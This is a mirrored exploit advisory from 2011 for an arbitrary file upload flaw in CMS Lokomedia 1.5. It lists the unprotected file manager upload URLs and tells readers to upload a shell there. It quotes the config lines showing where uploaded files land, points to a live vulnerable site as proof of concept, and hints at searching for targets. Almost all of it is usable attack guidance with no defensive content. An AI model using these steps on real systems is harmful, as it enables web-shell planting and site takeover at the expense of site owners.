CMS Lokomedia 1.5 – Arbitrary File Upload

• Exploit Database
• 103 阅读

• 作者： eidelweiss
  日期： 2011-03-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17014/

• ===================================================================
  CMS Lokomedia 1.5 Arbitary file upload vulnerability
  ===================================================================
   
  Software: CMS Lokomedia
  Vendor: http://bukulokomedia.com/home
  Vuln Type:Arbitary file upload
  Download link:http://bukulokomedia.com/lokomedia-1.5.rar
  Author: eidelweiss
  contact:eidelweiss[at]windowslive[dot]com
  Home: www.eidelweiss.info
  DORK:	use your skill and play your imagination :P
  
  Gratz:
  - Kuris : status udah merit aja beib.. kgak undang² iks..
  - Richie : RebelgiRL (Limited edition.. lol) live is never flate so enjoy this live mate ^_^
  
  
  References: http://eidelweiss-advisories.blogspot.com/2011/03/cms-lokomedia-15-arbitary-file-upload.html
   
   
  ===================================================================
   
  
  ----------------------------------
   
  exploit & p0c
  
  [!] http://host/path_to_lokomedia/tinymcpuk/filemanager/browser.html	// upload your file here
  		or
  [!] http://host/tinymcpuk/filemanager/browser.html
  or
  [!] http://host//tinymcpuk/filemanager/frmupload.html
  or
  [!] http://host/path_to_lokomedia/tinymcpuk/filemanager/frmupload.html
   
  your shell or file will be placed here
   
  /*------------------------------------------------------------------------------*/
  /* Path to user files relative to the document root (no trailing slash)		*/
  /*------------------------------------------------------------------------------*/
  $fckphp_config['UserFilesPath'] = "./lokomedia/tinymcpuk/gambar" ;			// <= here 
  /*==============================================================================*/
  /* Apabila sudah di-onlinekan, ubah baris 47 dengan settingan seperti berikut:
  $fckphp_config['UserFilesPath'] = "./tinymcpuk/gambar" ; */				// <= or here
  
  ----------------------------------
  
  	live poc : http://www.ikafela.com./tinymcpuk/filemanager/browser.html
   
   
  ====================================================================
   
  Nothing Impossible In This World Even Nobody`s Perfect
   
  ===================================================================
   
  ==========================| -=[ E0F ]=- |==========================
  

  Python

  Copy